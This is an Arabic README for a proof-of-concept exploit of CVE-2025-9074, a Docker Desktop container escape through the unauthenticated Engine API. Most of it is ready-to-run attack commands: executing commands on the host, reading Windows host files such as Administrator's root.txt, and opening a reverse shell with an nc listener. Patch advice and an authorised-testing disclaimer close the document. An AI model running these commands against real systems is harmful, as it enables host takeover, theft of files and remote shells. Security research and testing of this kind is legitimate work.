
إثبات المفهوم لاستغلال CVE-2025-9074 - هروب غير موثّق من حاوية Docker Engine API يؤثر على Docker Desktop < 4.44.3 على Windows و macOS (CVSS 9.3)
إثبات المفهوم لثغرة CVE-2025-9074 - ثغرة حرجة للهروب من الحاوية في Docker Desktop تسمح بالوصول غير الموثّق إلى واجهة Docker Engine API.
| الخاصية | القيمة |
|---|---|
| معرف CVE | CVE-2025-9074 |
| درجة CVSS | 9.3 (حرجة) |
| البرنامج المتأثر | Docker Desktop < 4.44.3 |
| المنصات المتأثرة | Windows، macOS (Linux غير متأثر) |
| الإصدار المُصلَّح | Docker Desktop 4.44.3+ |
| المكتشفون | Felix Boulet، Philippe Dugré |
| تاريخ الاكتشاف | منتصف 2025 |
| تاريخ التصحيح | 20 أغسطس 2025 |
تسمح الثغرة للحاويات التي تعمل على Docker Desktop بالوصول إلى واجهة Docker Engine API على http://192.168.65.7:2375 بدون مصادقة. يحدث هذا بغض النظر عن:
تم كشف واجهة Docker Engine API على مقبس TCP يمكن الوصول إليه من داخل الحاويات، مما يسمح بـ:
pip3 install requests
# تنفيذ أمر على المضيف
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# قراءة الملفات من مضيف Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"
# سرد المستخدمين على Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# الطرفية 1: إعداد المستمع
nc -lvnp 4444
# الطرفية 2: تشغيل الأداة
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <عنوان_IP_الخاص_بك> -p 4444
# بعد الاتصال، نظام ملفات المضيف موجود في: /hostfs
# إذا كان لديك بالفعل وصول إلى حاوية
curl http://192.168.65.7:2375/version
graph TD
A[حاوية خبيثة] -->|بدون مصادقة| B[واجهة Docker Engine API<br/>192.168.65.7:2375]
B -->|إنشاء حاوية| C[حاوية بامتيازات]
C -->|ربط نظام ملفات المضيف| D[وصول كامل للمضيف]
D -->|قراءة/كتابة| E[اختراق النظام]
قم بتحديث Docker Desktop إلى الإصدار 4.44.3 أو أحدث فوراً.
# تحقق من إصدار Docker Desktop لديك
docker --version
# تحديث Docker Desktop
# Windows: التحميل من https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: التحميل من https://desktop.docker.com/mac/main/amd64/Docker.dmg
إذا لم يكن التحديث الفوري ممكناً:
تم توفير هذه الأداة لأغراض تعليمية واختبارات أمنية مرخصة فقط.
رخصة MIT - انظر ملف LICENSE للتفاصيل